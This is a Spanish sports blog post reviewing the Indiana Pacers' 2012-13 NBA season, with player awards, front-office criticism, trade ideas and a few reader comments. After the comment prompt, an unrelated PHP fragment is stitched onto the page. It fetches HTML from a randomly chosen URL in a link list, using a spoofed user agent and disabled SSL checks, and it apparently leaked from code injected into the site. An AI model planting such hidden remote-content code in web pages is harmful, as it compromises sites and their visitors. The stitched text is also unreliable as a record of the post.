Indiana Pacers: Sobresaliente

06 de July de 2013 por Esteban

El análisis previo a la temporada estaba bañado de pesimismo, lo que desembocó en darles como semifinalistas de conferencia como máximo. A la postre resultó evidente que nos quedamos cortos. El pesimismo que giraba en torno a este equipo se debía a cierta falta de ambición o de toma de riesgos para mejorarlo desde los despachos. Esto lo dejaba algo atrás de planteles muy mejorados en mi opinión como los Nets y los Knicks, los siempre peligrosos Celtics y los Bulls cuando aún se creía que Rose volvería. Apostaban por mantener a Danny Granger como jugador franquicia a pesar de evidenciar un lento pero sostenido retroceso en su nivel año a año, y de obligar, de esto modo, a que Paul George jugara de escolta, cuando según nuestra opinión podía ser un alero all-star.

A comienzo de temporada se conoció la grave lesión de Granger, lo que dejaba a un equipo aparentemente malo ofensivamente sin su máximo anotador de las ultimas 5 temporadas y con muy pocos recursos como para suplir los 18/20 ppp de Danny. Tal es así que un arranque fatídico con varias derrotas y una incapacidad total para generar ofensivas, hizo que aparecieran críticas contra Frank Vogel, a quien se le acusaba de haber firmado un contrato muy superior al que merecía.

Pero como dice el refrán, no hay mal que por bien no venga.

Los Pacers tardaron  en acomodarse pero una vez que lo hicieron dieron en la cancha el salto de calidad que los directivos no dieron en la mesa. La ausencia de Granger, permitió de una vez por todas apostar por Paul George como alero y permitió el ingreso en el cuadro titular de Lance Stephenson, por quien nos la jugábamos en el análisis previo y presagiábamos la titularidad que terminó consiguiendo. Con esas leves modificaciones, los Pacers pasaron de ser un gran equipo defensivo a uno excelente, con longitud en todas su líneas y una entrega emocionante que con Granger no tenían. 

Superaron pronto el mal arranque de temporada y pronto se metieron en puestos de PO para después del parón por el All-Star entrar definitivamente en la lucha por el segundo puesto de la conferencia Este. Lamentablemente, su mal arranque, en contraposición al excelente arranque de los Knicks, los dejaron finalmente terceros.

Luego vinieron los PO en los que se sacaron de encima no sin sudar a Hordford y Smith con un 4-2 en primera ronda y luego destrozaron a los Knicks en semis, con un Roy Hibbert que empezaba a presagiar lo que haría frente a los Heat. La final de conferencia, a nada menos que 7 juegos con el a la postre campeón Miami Heat, fue ontológica. Con menos de la mitad de los recursos del Heat, vendieron carísima su derrota y llevó a la consagración de su propio “Big Five”, quienes jugaron sin ayuda prácticamente de sus suplentes y casi hacen saltar la banca.

El escepticismo inicial se debía a mantener a Granger como alero cuando era evidente que dicho puesto debía ser ocupado por George y Granger debía ser traspaso por un escolta que aporte creación de tiro, una necesidad alarmante en Indiana. La lesión de Granger les dio otra cara, demostró que Vogel es uno de los mejores entrenadores de la NBA, le dio el salto de calidad que necesitaba George, los hizo mejores en defensa y hasta sacaron del fondo del baúl a un jugador sumamente útil como Stephenson.

A veces el destino juega a favor.

PREMIOS

MVP: Al final pudimos disfrutar de Paul George en su posición y el resultado no pudo ser mas satisfactorio. Enumerando… All-Star, MIP, líder absoluto del equipo, grandes porcentajes de tres puntos, partidos de 38 puntos con 9/12 en triples, partidos de 17 rebotes, una serie regular muy buena y unos PO frente a unos tales Carmelo Anthony y Lebron James de antología. Y solo es su tercer año en la liga… Si logra encontrar algún recurso ofensivo más solido o si aprovechara más su estatura para ir al poste, tendríamos candidado a MVP. George Hill, criticado por su contrato, demostró su valía. Puede que tenga algunos problemas en la dirección pero hace todo el resto de las cosas bien y sobre todo tiene un temple enorme para los momentos calientes de los juegos, cosa que en un equipo que en el futuro disputará muchas series de PO será muy valorado. David West quizá jugo pensando en como discutirá su próximo contrato, pero lo cierto es que si no fue su mejor temporada en la liga pasó raspando. Una serie regular con enormes números y partidos impresionantes tanto frente a los Knicks como al Heat. Roy Hibbert demuestró como pasar de ser comparado con Eric Dampier a Kareem Abdul-Jabbar… Un arranque decepcionante que hacía arrepentirse a toda Indiana del contrato que le habían firmado, con números más bajos que los últimos años y con cierta displicencia que lo hacían parecer un “gana contratos”. Poco a poco fue levantado su nivel hasta terminar la temporada regular en la forma que la había dejado el año pasado. Los PO fueron la frutilla del postre. En una liga sin grandes pivotes y con equipos rivales extremadamente bajos como Knicks y Heat, hizo y deshizo a su gusto en dichas series, con números que no se veían desde la época de Shaq o del mejor Howard. Hoy no solo no parece que tenga un contrato desproporcionado sino que hasta parece barato. Si el Heat sigue insistiendo con Bosh de pívot, la llave a la final de la NBA puede ser este hombre.

Rookie: No ha habido grandes rookies en Indiana este año, incluso ha sido casi decepcionante lo de Mason Pumplee después de una temporada veraniega bastante interesante.  Quien ha surgido con fuerza es un veterano Orlando Johnson, quien aprovechó la falta de anotación del banco de los Pacers para hacerse un lugar a base de tiros.

Sorpresa: Lance Stephenson. No para nosotros que le venimos viendo condiciones hace tiempo y en la liga de verano sencillamente la rompió pero la NBA no esperaba a que el muchacho de Brooklyn irrumpiera de esa manera. Se convirtió en uno de los mejores defensores de la liga y su agresividad y desfachatez lo llevaron incluso hasta a jugar bien en ataque. Larry Bird sonríe desde su casa. Un brindis por él.

Decepción: Donnie Walsh resume por si mismo todas las decepciones del equipo Pacer, pues ni Hill, ni George, ni Stephenson, ni West, ni Hibbert ni Tyler fueron elegidos por él y en cambio fueron los responsables de la buena temporada del equipo. A quien sí firmó este GM fue a DJ Augustine, quien a pesar de dejar todo su esfuerzo quedó lejos del nivel general; a Gerald Green, que tuvo partidos en la fase regular que pueden servirle para conseguirle comprador pero miró los PO enteros desde la banca; y a Ian Mahimi, sobre quien se apostó muchísimo y terminó aportando lo mismo que aportan los cachos de carne como Collins, Hollins o Turiaf: Pocos minutos, faltas y nada más. Tampoco movió piezas cuando se lesionó Granger y resultaba evidente que los Pacers necesitaban a alguien capaz que anotar algún puntito desde la banca. El año pasado el fichaje de Barbosa fue trascendental gracias al ojo de Bird. Este año, sin ese ojo, los Pacers jugaron sin banquillo.

Esfuerzo en Vano: Aquí el premio y el reconocimiento es para Frank Vogel. Hace dos años y medio tomó el equipo en puestos de lotería y con algunos retoques logró meterlos en PO ese año y ganarle un juego a los Bulls. Al año siguiente, sin mejores mimbres, logró llegar hasta segunda ronda y plantarle cara a los futuros campeones, y este año, sin banquillo y sin Granger, llegó a final de conferencia cayendo nada menos que en el juego 7. Subestimado entrenador que parece tener una brillante carrera por delante.

JUGANDO A GM

Dificilísima tarea esta. Sin duda Granger debe salir pero su salario es muy alto y no conseguirán un escolta bueno con un año de contrato y de tal valor (lo mas parecido era una Monta Ellis, y ni soñar con Eric Gordon). Lo ideal sería traspasarlo por una trade exception a por ejemplo Cavs,  Hawks o Mavs, equipos a los que les sobra espacio. El dinero que liberaría Granger debe ser destinado a la renovación de David West, que cobrará 12 kilos durante las siguientes 3 temporadas, a la de Stephenson, y al futuro contratazo que se llevará Paul George.

Las necesidades del equipo son claras: un base suplente, un escolta revulsivo desde el banco y un alero que el menos anote sus triples abiertos pero con los millones inútilmente destinados a Green y Mahinmi (7 en total) sumados a lo que cobrará su 5 inicial y lo reticentes que son en Indiana al impuesto de lujo, se duda que haya grandes fichajes. De momento ya se ha fichado a CJ Watson  y Donald Sloan para ejercer de base suplente.

Si consiguen un comprador por Green sería ideal, sinó habrá que esperar que Orlando Johnson mantenga su progresión y renovar por el mínimo a un trabajador como Sam Young, o algunos útiles elementos que fichan por el mínimo como Ronnie Brewer, Radmanovic o algún bulto similar.

Si Granger no puede irse por una trade expection, habría que amnistiarlo salvo que la oferta sea demasiado buena (Afflalo y Glen Davis por su expiring sería un negoción), y buscar un escolta que pueda salir del banco o disputarle la titularidad a Stephenson. Mi mirada estaba en Tyreke Evans pero este ya se ha ido a los Pelicans. OJ Mayo también sería una buena opción pero se necesitaría disponible un dinero que ahora no tienen.

Comenta

4 comentarios a esta entrada

  1. Denise dice:
    #1

    Pues el Granger por Afflalo y Davis que planteas me gusta. Economicamente, sería un chollazo para los Magic y deportivamente a los Pacers les daría mucha profundidad y les evitaría renovar a Hansbrough, ya que Big Baby puede suplir tanto a West como a Hibbert.
    A estas alturas de la reconstrucción, los Magic a Granger no le darían mas de 30 minutos, no puede quitarle la progresión a Harkless, y yo creo que incluso podrían volver a usarlo como moneda de cambio por rondas de Draft a equipos que quieren ir a más como Dallas, Minny o Denver.

      Citar

  2. Simon dice:
    #2

    Excelente Esteban. Me encantan estos Pacers… la lastima es el tema del mercado pequeño… pero ahora con Bird de vuelta seguro q algun as se saca de la manga para seguir refrzando el equipo.

      Citar

  3. Esteban dice:
    #3

    ya estan fuera de carrera por MAYO

    un alero sueplente que pediamos ya es COOPELAND, pero granger sigue en el equipo… no hay amnistia disponible para el pues os pacers ya la usaron en james posey

    al parecer, granger se quedaria y quien se fue es hasbroguh… no me gusta nada

    ahora mas que nunca, sin hasbrogh y con coopeland, vendria genial un escolta como afflalo y un 4 como davis

    son muchos millones para el proximo año si, pero son traspasables tanto aflallo como davis

      Citar

  4. simon dice:
    #4

    Es una lástima, pues aunque siempre en las temporadas vaya de mas a menos hansbrough les hacía un papelón…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>